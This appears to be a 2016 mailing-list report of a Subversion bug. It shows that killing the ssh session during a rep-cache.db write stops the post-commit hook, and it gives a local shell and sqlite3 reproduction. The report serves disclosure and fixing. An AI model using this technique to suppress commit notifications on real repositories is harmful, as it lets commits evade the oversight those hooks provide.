When using svn+ssh://, if the ssh session is killed whilst rep-cache.db
is being written to, then the post-commit hook won't run.
The problem is that a malicious committer could intentionally kill the
ssh session at that point in time, to prevent post-commit emails from
being sent, and so on.
Proof of concept:
% rm -rf r
% svnadmin create r
% printf '%s\n' '#!/bin/sh' 'touch /tmp/good' > r/hooks/post-commit
% chmod +x r/hooks/post-commit
% rm -f /tmp/good
%
% svnmucc put -mm r/README.txt file://$PWD/r/$RANDOM # creates rep-cache.db
% rm /tmp/good
%
% sqlite3 r/db/rep-cache.db
sqlite> begin immediate transaction;
sqlite> ^Z
zsh: suspended sqlite3 r/db/rep-cache.db
% svnmucc put -mm =(date; echo $RANDOM) svn+ssh://localhost/$PWD/r/$RANDOM
daniel_at_localhost's password:
^Z
zsh: suspended svnmucc put -mm =(date; echo $RANDOM) svn+ssh://localhost/$PWD/r/$RANDOM
% pkill -x ssh
% rm /tmp/good
rm: cannot remove ‘/tmp/good’: No such file or directory
zsh: exit 1 rm /tmp/good
Received on 2016-10-22 14:20:22 CEST